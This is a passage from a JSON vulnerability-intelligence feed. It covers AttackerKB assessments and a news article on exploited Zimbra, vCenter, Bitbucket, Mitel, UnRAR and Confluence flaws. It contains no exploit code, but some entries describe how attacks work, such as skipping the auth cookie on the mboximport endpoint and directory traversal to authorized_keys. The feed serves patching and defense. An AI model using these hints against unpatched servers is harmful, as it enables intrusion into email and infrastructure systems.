"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-37042", "CVE-2022-37393"], "modified": "2022-11-03T00:00:00", "id": "AKB:48EF6C32-59B4-4AD7-BE9A-0EE8A2E86072", "href": "https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T17:15:07", "description": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 23, 2022 4:47pm UTC reported:\n\nThis is a privilege-escalation vulnerability in Zimbra, to go from the `zimbra` user to `root`. As of writing, this has been publicly known for nearly a near, and reported to Zimbra for about a month.\n\nAlthough it requires an account, there have been a whole pile of recent CVEs that get you there \u2013 [CVE-2022-30333](<https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis>), [CVE-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>), and [CVE-2022-27924](<https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924/rapid7-analysis>)\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-16T00:00:00", "type": "attackerkb", "title": "CVE-2022-37393", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-30333", "CVE-2022-37393"], "modified": "2022-08-16T00:00:00", "id": "AKB:519DD30E-F9A7-4A5E-A57B-DF4E4B9B20F1", "href": "https://attackerkb.com/topics/92AeLOE1M1/cve-2022-37393", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T14:45:19", "description": "Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 allows an unauthenticated attacker to inject arbitrary memcache commands into a targeted instance. These memcache commands becomes unescaped, causing an overwrite of arbitrary cached entries.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 16, 2022 8:10pm UTC reported:\n\nUltimately, this is annoying and unreliable to exploit, but we did get it working and confirm it\u2019s a problem.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 1\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-16T00:00:00", "type": "attackerkb", "title": "CVE-2022-27924", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-30333"], "modified": "2022-08-16T00:00:00", "id": "AKB:C83F5B74-AC72-42D5-A71F-C8F4144C4C9D", "href": "https://attackerkb.com/topics/6vZw1iqYRY/cve-2022-27924", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T17:14:34", "description": "Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at September 20, 2022 9:03pm UTC reported:\n\nVery easy patch to reverse and exploit to develop. Public proof of concept exist, as well as a Metasploit module. Very important to patch!\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-24T00:00:00", "type": "attackerkb", "title": "CVE-2022-36804", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-30333", "CVE-2022-36804"], "modified": "2022-09-21T00:00:00", "id": "AKB:A5F9A5B4-EEF8-4409-9D1D-846536B8D033", "href": "https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T17:15:00", "description": "Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at August 23, 2022 4:43pm UTC reported:\n\nThis is basically [cve-2022-27925](<https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis>) \u2013 it\u2019s the same exploit, but you don\u2019t send an auth cookie and it fails to prevent access.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-12T00:00:00", "type": "attackerkb", "title": "CVE-2022-37042", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-11-03T00:00:00", "id": "AKB:042573E7-4FF2-4D52-842B-E72379F0C4D0", "href": "https://attackerkb.com/topics/BLL1VR8x6z/cve-2022-37042", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:39:40", "description": "The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 24, 2021 3:58am UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\n**NinjaOperator** at September 21, 2021 6:53pm UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\n**architect00** at September 22, 2021 1:31pm UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T00:00:00", "type": "attackerkb", "title": "CVE-2021-22005", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-22005"], "modified": "2021-09-29T00:00:00", "id": "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "href": "https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T02:14:56", "description": "An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavisd automatically prefers it over cpio.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at October 06, 2022 9:31pm UTC reported:\n\nThis is I think the 6th major issue with Zimbra this year. It\u2019s not really their fault, they use Amavis which uses `cpio` which is vulnerable to CVE-2015-1197, but the attack surface for incoming emails is HUGE.\n\nNot to mention, this is one of several vulnerabilities this year that was being exploited in the wild before being discovered, which means Zimbra is an active target for the Bad Guys.\n\nIf you\u2019re still using Zimbra, you might want to seriously reconsider. I betcha there are others, and they\u2019re probably being exploited.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-26T00:00:00", "type": "attackerkb", "title": "CVE-2022-41352", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1197", "CVE-2022-30333", "CVE-2022-37393", "CVE-2022-41352"], "modified": "2022-11-10T00:00:00", "id": "AKB:82991046-210F-4C54-A578-8E09BD9F6D88", "href": "https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T23:15:56", "description": "The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T00:00:00", "type": "attackerkb", "title": "CVE-2022-29499", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-04-26T00:00:00", "id": "AKB:9CE495DA-1E3B-4486-85DA-2F4FAB15E355", "href": "https://attackerkb.com/topics/M1DmDykURB/cve-2022-29499", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T15:01:09", "description": "The Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T00:00:00", "type": "attackerkb", "title": "CVE-2022-26138", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-20T00:00:00", "id": "AKB:8049CCA9-ACA9-4288-8493-4153794BD621", "href": "https://attackerkb.com/topics/BUK2DJ8uhl/cve-2022-26138", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T14:45:10", "description": "RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at July 18, 2022 4:55pm UTC reported:\n\nWhile we focused on Zimbra in our analysis, there are almost certainly other targets for this vulnerability that we are not aware of yet.\n\nExploiting this against Zimbra is really bad \u2013 it can be done fairly quietly and it doesn\u2019t require direct access to the server, and can easily lead to root access to the server hosting users\u2019 email. This is super urgent to patch on Zimbra!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-19T00:00:00", "type": "attackerkb", "title": "CVE-2022-30333", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-07-19T00:00:00", "id": "AKB:EFC2EE2A-9172-4B00-94C9-6CC133BD4B05", "href": "https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-05-27T14:39:39", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n\n \n**Recent assessments:** \n \n**ccondon-r7** at February 24, 2021 11:19pm UTC reported:\n\nUpdate March 3: Exploitation in the wild was confirmed over the weekend. See the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=assessment#rapid7-analysis>) for more updates.\n\nThere are [reports of opportunistic scanning](<https://twitter.com/bad_packets/status/1364661586070102016>) for vulnerable vCenter Server endpoints and a bunch of PoC that\u2019s made its way to GitHub over the past twelve hours or so. There hasn\u2019t been confirmation of in-the-wild exploitation yet, but it\u2019s hard to imagine that lasting for very long given the enterprise-grade incentives for attackers. As **@wvu-r7** points out in the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), the update available for folks on vulnerable versions of vCenter Server merely adds authentication, addressing the attack chain rather than resolving the root cause of the vulnerability; I\u2019d be a little surprised if we didn\u2019t see a follow-on CVE at some point for an authentication bypass.\n\n**wvu-r7** at February 24, 2021 10:11pm UTC reported:\n\nUpdate March 3: Exploitation in the wild was confirmed over the weekend. See the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=assessment#rapid7-analysis>) for more updates.\n\nThere are [reports of opportunistic scanning](<https://twitter.com/bad_packets/status/1364661586070102016>) for vulnerable vCenter Server endpoints and a bunch of PoC that\u2019s made its way to GitHub over the past twelve hours or so. There hasn\u2019t been confirmation of in-the-wild exploitation yet, but it\u2019s hard to imagine that lasting for very long given the enterprise-grade incentives for attackers. As **@wvu-r7** points out in the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), the update available for folks on vulnerable versions of vCenter Server merely adds authentication, addressing the attack chain rather than resolving the root cause of the vulnerability; I\u2019d be a little surprised if we didn\u2019t see a follow-on CVE at some point for an authentication bypass.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T00:00:00", "type": "attackerkb", "title": "VMware vSphere Client Unauth Remote Code Execution Vulnerability \u2014 CVE-2021-21972", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-04-05T00:00:00", "id": "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "href": "https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-08-12T08:05:53", "description": "[![Zimbra RCE Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg9qxbn7rtwp_8HhHdLMCtdFHTS9P9h30LT9JeykqY-hsQi19Y7sKajWFMyeViTZ2691A1RS21KFyOFcoNpHOwRECgwd8gscsC1zGe9BJFv8IWB92a9Xz8hfZhfJqPT6xKB-avmgK7jSEUsQK9qOpai3Bzve7V0tn8fK_PdV5GgLxYz93exTC7im01N/s728-e1000/zimbra.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg9qxbn7rtwp_8HhHdLMCtdFHTS9P9h30LT9JeykqY-hsQi19Y7sKajWFMyeViTZ2691A1RS21KFyOFcoNpHOwRECgwd8gscsC1zGe9BJFv8IWB92a9Xz8hfZhfJqPT6xKB-avmgK7jSEUsQK9qOpai3Bzve7V0tn8fK_PdV5GgLxYz93exTC7im01N/s728-e100/zimbra.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/08/11/cisa-adds-two-known-exploited-vulnerabilities-catalog>) two flaws to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), citing evidence of active exploitation.\n\nThe two high-severity issues relate to weaknesses in Zimbra Collaboration, both of which could be chained to achieve unauthenticated remote code execution on affected email servers -\n\n * [**CVE-2022-27925**](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>) (CVSS score: 7.2) - Remote code execution (RCE) through mboximport from authenticated user (fixed in [versions](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>) 8.8.15 Patch 31 and 9.0.0 Patch 24 released in March)\n * [**CVE-2022-37042**](<https://nvd.nist.gov/vuln/detail/CVE-2022-37042>) \\- Authentication bypass in MailboxImportServlet (fixed in [versions](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>) 8.8.15 Patch 33 and 9.0.0 Patch 26 released in August)\n\n\"If you are running a Zimbra version that is older than Zimbra 8.8.15 patch 33 or Zimbra 9.0.0 patch 26 you should update to the latest patch as soon as possible,\" Zimbra [warned](<https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/>) earlier this week.\n\nCISA has not shared any information on the attacks exploiting the flaws but cybersecurity firm Volexity [described](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) mass in-the-wild exploitation of Zimbra instances by an unknown threat actor.\n\nIn a nutshell, the attacks involve taking advantage of the aforementioned authentication bypass flaw to gain remote code execution on the underlying server by uploading arbitrary files.\n\n[![Zimbra RCE Vulnerability](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhV1fby0Cn0K6lGZPpZ_qkx0XEbpXXu9JqeqYyQjSGENl8OIeWZ_NRLD3lLIk4vqar0nZaCUNSeTYYqWVwHfkK1OOzxMrjCUgzpEtGbB6YzEV1U3-C43T9bPbMWrnooZrVJwJ7dTU4DDoVBX32qrIPP9Ay9AGtmUz3HS_uj5mYw9n20cjXOo9Q3lWy/s728-e1000/map.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhV1fby0Cn0K6lGZPpZ_qkx0XEbpXXu9JqeqYyQjSGENl8OIeWZ_NRLD3lLIk4vqar0nZaCUNSeTYYqWVwHfkK1OOzxMrjCUgzpEtGbB6YzEV1U3-C43T9bPbMWrnooZrVJwJ7dTU4DDoVBX32qrIPP9Ay9AGtmUz3HS_uj5mYw9n20cjXOo9Q3lWy/s728-e100/map.jpg>)\n\nVolexity said \"it was possible to bypass authentication when accessing the same endpoint (mboximport) used by CVE-2022-27925,\" and that the flaw \"could be exploited without valid administrative credentials, thus making the vulnerability significantly more critical in severity.\"\n\nIt also singled out over 1,000 instances globally that were backdoored and compromised using this attack vector, some of which belong to government departments and ministries; military branches; and companies with billions of dollars of revenue.\n\nThe attacks, which transpired as recently as the end of June 2022, also involved the deployment of web shells to maintain long-term access to the infected servers. Top countries with the most compromised instances include the U.S., Italy, Germany, France, India, Russia, Indonesia, Switzerland, Spain, and Poland.\n\n\"CVE-2022-27925 was originally listed as an RCE exploit requiring authentication,\" Volexity said. \"When combined with a separate bug, however, it became an unauthenticated RCE exploit that made remote exploitation trivial.\"\n\nThe disclosure comes a week after CISA added another Zimbra-related bug, [CVE-2022-27924](<https://thehackernews.com/2022/08/cisa-adds-zimbra-email-vulnerability-to.html>), to the catalog, which, if exploited, could allow attackers to steal cleartext credentials from users of the targeted instances.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-12T06:14:00", "type": "thn", "title": "Researchers Warn of Ongoing Mass Exploitation of Zimbra RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 